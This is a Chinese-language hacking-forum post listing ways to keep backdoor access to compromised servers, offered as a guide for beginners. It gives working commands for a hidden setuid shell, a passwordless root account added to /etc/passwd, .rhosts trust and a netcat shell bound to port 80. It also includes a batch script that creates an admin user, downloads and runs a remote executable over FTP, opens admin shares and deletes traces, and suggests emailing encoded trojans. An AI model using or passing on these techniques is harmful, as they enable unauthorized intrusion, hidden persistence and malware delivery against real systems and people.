  
- 帖子
- 251
- 积分
- 550
- 威望
- 644
- 金钱
- 87976
- 在线时间
- 51 小时
         
|
1. Setuid
#cp /bin/sh /tmp/.root
#chmod u s /tmp/.root
加上 suid 位到shell 上,虽然很简单,但容易被发现。
2. Echo "hack::0:0::/:/bin/csh" >> /etc/passwd
即给系统增加一个 ID 为 0(root)的帐号,无口令,但管理员用find命令就可以发现。
3.Echo " hack">>/.rhosts
如果这个系统开了512、513的port,就可以。把一个名为hack加到.rhosts文件中,rlogin登陆,无须密码。
4.修改 Sendmail.cf文件
增加一个"wiz" 命令,然后telnet www.xxx.com 25后,wiz,这就可以了。
5. Rootkit backdoor
这些东西现在是很火热的东西,但小心该后的文件的适用性、日期等等一些小的细节。有的需要自己编译,有的是编译好的。
6.Remote shell
Sunx的那个backdoor就很不错,不会产生日记文件,防止who等等。需要编译,但运行在redhat 6.1很不错。但在7.1等版本中好象就有点bug。
或者可以bindshell,可以替换inetd.conf中不常用的服务,注意文件的修改时间。
7. Http后门
其实,一般的防火墙对Web服务的限制少的很,所以我们可以从这里入手,这里需要用到端口重定向。简单的说就是web开的http服务有2个,一个是http本身,一个是remote shell bindshell。防火墙过滤其他一切port,禁止反向连接,简单的就是可以用nc。(netcat这个)把cmd.exe绑定到80端口上去。telnet www.xxx.com 80 然后就得到一个shell。或者可以利用asp,php.cgi等代码写的后门,也可以作到相同的效果。
8.Bat后门(原创)
如果是xnix服务器,没办法。
Ms服务器:
backdoor.bat
net user hacker windychild /add
net localgroup administrators hacker /add ...create super admin user
echo open www.xxx.com>c:\ftp.txt
echo xxx>>c:\ftp.txt
echo xxxxxx>>c:\ftp.txt
echo get srv.exe>>c:\ftp.txt
echo bye>>c:\ftp.txt
ftp -s:c:\ftp.txt
copy srv.exe c:\winnt\
c:\winnt\srv.exe
del c:\ftp.txt
del c:\srv.exe ......可以自己设置木马或后门等
....或你可以写上开启3389服务,telnet的语句
其他,开放共享服务!
net share ipc=ipc$
net share hdc=c$
......
如果狠点的话,干脆再给它上个rootkit for win。
9.可以利用邮件编码漏洞
自己设置一个base64的编码文件发给你的朋友,然后把后门.exe转换成邮件编码。
其实,上面的方法都是很常见的方法。还有很多方法,一时没办法整理出来,但对于新手来说足够了!
:) :) :) |
|